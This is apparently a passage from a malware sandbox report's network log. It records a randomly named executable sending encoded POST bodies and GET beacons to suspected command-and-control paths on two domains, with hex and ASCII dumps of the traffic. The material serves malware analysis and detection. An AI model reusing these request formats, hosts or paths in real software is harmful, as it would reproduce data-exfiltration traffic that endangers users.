                                                                                              Data Raw: 49 34 45 54 35 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 32 44 68 6d 44 4e 52 69 79 75 6c 65 45 77 4f 50 42 49 52 39 4c 72 76 32 57 51 55 44 6e 49 6c 6d 46 57 6b 4a 4a 68 72 6e 64 55 46 67 3d 3d
                                                                                              Data Ascii: I4ET5=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj2DhmDNRiyuleEwOPBIR9Lrv2WQUDnIlmFWkJJhrndUFg==
                                                                                              Oct 8, 2024 15:54:21.135868073 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:21 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.650002217.70.184.50802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:23.084533930 CEST1869OUTPOST /nxfn/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Origin: http://www.languagemodel.pro
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.languagemodel.pro/nxfn/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 45 6a 2f 37 35 2b 57 4d 42 59 69 78 36 46 32 56 6e 4d 53 55 79 52 6a 2f 67 55 50 2b 74 75 66 4d 6a 70 32 53 71 64 63 77 6d 6b 6c 30 56 61 72 63 73 4c 70 58 45 4e 55 59 2f 4e 56 31 6b 72 6c 65 51 55 79 59 63 6f 62 64 6c 63 70 78 63 72 4e 4e 4c 67 57 55 4d 58 53 42 41 42 39 59 65 31 50 73 69 4a 31 67 74 68 37 66 33 43 44 4b 4f 2b 53 78 2f 38 5a 76 4f 75 51 6d 37 52 71 75 41 59 54 78 38 4c 39 2f 4e 6a 76 4a 4d 4b 52 48 5a 44 6e 47 36 51 38 5a 7a 77 51 37 33 38 77 76 39 30 4b 2b 73 53 [TRUNCATED]
                                                                                              Data Ascii: I4ET5=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai4Ej/75+WMBYix6F2VnMSUyRj/gUP+tufMjp2Sqdcwmkl0VarcsLpXENUY/NV1krleQUyYcobdlcpxcrNNLgWUMXSBAB9Ye1PsiJ1gth7f3CDKO+Sx/8ZvOuQm7RquAYTx8L9/NjvJMKRHZDnG6Q8ZzwQ738wv90K+sSqB5/lEU8haTiPcJs3wFp2rxhk/YSeKIu15vXvd3ffInwFu/YX5nvJZl6prga3YBnuAp2WFoNkRo0QUcNAl9S2BXY7oKWOfOKCJyiulkQ32XoymN5VOVFr/xtvpjrxUENPkpJbBSZvXSb8CMO+y3IoaN6yvjPYPe9JGXkO5JgzhsWqr5NnOEETn8FxAeBetj8xwz5x8kjDVjjEJOW94dz5XDgGd2Fk0e2qMG7swDNr1nqRm6OXBK/qUkO0D+tm3xdYzfzojSm6Twz4TFmkj/kOW1rSj00RR0oWi8EqDA/GUP7TRVEX1HRYUhQlc42gm85NA0urWHY89LLaiT4SWWszad5ihVCrpduSLfJBVa1RUEGWgz+KLOoPNbBGWTOCY9Li7V2adVg8H3hoSAyGLQ+lTLRk9GNHyN6oWJtfhcjY3KJ/DI0SBz/qJShCUVoYf1MFKBdu74xQQaQfKNJik5qnUn/4ledzg03DOK89ol/rDFMVynGn8/JvmVr+IAVK4yOydumkPfQ06HqvPwE0+rT3aEIsCRDVo5674QFUCSpdGPvLF8+EjIb/u0j509CvUv7Xp28uu71uXo0zKQbASjmtTY2mWB4fCqWZ6+jtO3YbpZTuB9+9+XFYR5BVOExG9c3mXUGwYIYffx2bBJGzcJML5LPmL36D2xgQO [TRUNCATED]
                                                                                              Oct 8, 2024 15:54:23.693427086 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:23 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.650003217.70.184.50802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:25.630117893 CEST570OUTGET /nxfn/?I4ET5=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfWaAaU8Sg/CwIadyJZ1Vunf0ESMtavaN5FCA7KYOqo/KmyEXwiQ=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:54:26.224725008 CEST1236INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Vary: Accept-Language
                                                                                              Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                                                              Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                                                              Oct 8, 2024 15:54:26.224885941 CEST914INData Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                                                                              Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.65000463.250.47.40802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:31.468534946 CEST811OUTPOST /3bdq/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Origin: http://www.kexweb.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.kexweb.top/3bdq/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 6a 56 36 34 4a 36 74 32 4c 75 5a 63 73 74 71 42 52 46 45 6e 70 37 62 78 71 75 4a 4d 37 39 36 72 31 30 67 55 47 56 62 71 38 37 66
                                                                                              Data Ascii: I4ET5=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqjV64J6t2LuZcstqBRFEnp7bxquJM796r10gUGVbq87f
                                                                                              Oct 8, 2024 15:54:32.058708906 CEST595INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:31 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.65000563.250.47.40802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:34.010711908 CEST835OUTPOST /3bdq/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Origin: http://www.kexweb.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.kexweb.top/3bdq/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 62 5a 78 6f 32 37 4d 62 39 51 70 31 4d 67 47 52 5a 38 6c 49 65 38 6a 4f 33 51 6b 35 34 57 73 6e 47 34 33 73 70 4c 64 71 44 6c 2b 77 3d 3d
                                                                                              Data Ascii: I4ET5=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15bZxo27Mb9Qp1MgGRZ8lIe8jO3Qk54WsnG43spLdqDl+w==
                                                                                              Oct 8, 2024 15:54:34.593308926 CEST595INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:34 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.65000663.250.47.40802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:36.562881947 CEST1848OUTPOST /3bdq/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Origin: http://www.kexweb.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.kexweb.top/3bdq/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 2b 52 66 4c 46 70 59 52 4e 4b 67 6f 62 38 6e 36 32 65 4a 66 42 61 77 32 41 36 41 78 6c 76 76 49 4f 73 73 35 66 48 73 34 74 48 74 58 71 59 35 36 35 56 51 35 4f 61 73 33 48 72 58 64 6d 42 78 73 36 58 6b 48 79 2b 77 2f 78 73 59 4d 2b 34 37 2f 44 65 6e 51 4c 4f 69 78 50 5a 43 6c 74 64 33 53 52 2f 63 70 52 66 73 49 34 59 50 36 51 56 48 78 41 36 65 4b 58 6c 72 50 31 67 61 44 4e 67 6d 2f 66 51 2f 73 35 72 4d 58 73 59 69 48 57 42 63 66 76 39 70 32 4e 6c 59 78 76 58 31 6b 49 32 74 78 38 31 [TRUNCATED]
